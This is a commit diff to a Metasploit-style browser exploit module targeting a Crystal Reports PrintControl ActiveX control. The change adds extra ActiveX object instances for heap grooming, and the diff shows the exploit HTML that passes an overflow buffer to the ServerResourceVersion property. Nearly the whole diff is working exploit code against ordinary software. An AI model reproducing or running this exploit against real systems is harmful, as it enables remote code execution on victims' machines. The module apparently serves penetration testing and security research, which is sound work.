after study the crash after the overflow...

jvazquez-r7 · jvazquez-r7 · commit 0a0b26dc2c3e · 2012-12-14T23:54:44.000+01:00
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -240,6 +240,11 @@ def load_exploit_html(my_target, cli)
 		target8 = rand_text_alpha(5 + rand(3))
 		target9 = rand_text_alpha(5 + rand(3))
 		target10 = rand_text_alpha(5 + rand(3))
+		target11 = rand_text_alpha(5 + rand(3))
+		target12 = rand_text_alpha(5 + rand(3))
+		target13 = rand_text_alpha(5 + rand(3))
+		target14 = rand_text_alpha(5 + rand(3))
+		target15 = rand_text_alpha(5 + rand(3))
 
 		# - 10 CrystalPrintControl objects are used to defragement the heap.
 		# - The 10th CrystalPrintControl is overflowed.
@@ -263,6 +268,11 @@ def load_exploit_html(my_target, cli)
 		<object id='#{target8}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
 		<object id='#{target9}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
 		<object id='#{target10}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
+		<object id='#{target11}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
+		<object id='#{target12}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
+		<object id='#{target13}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
+		<object id='#{target14}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
+		<object id='#{target15}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
 		<script>
 		var ret = unescape('#{js_bof}');
 		#{target9}.ServerResourceVersion = ret;
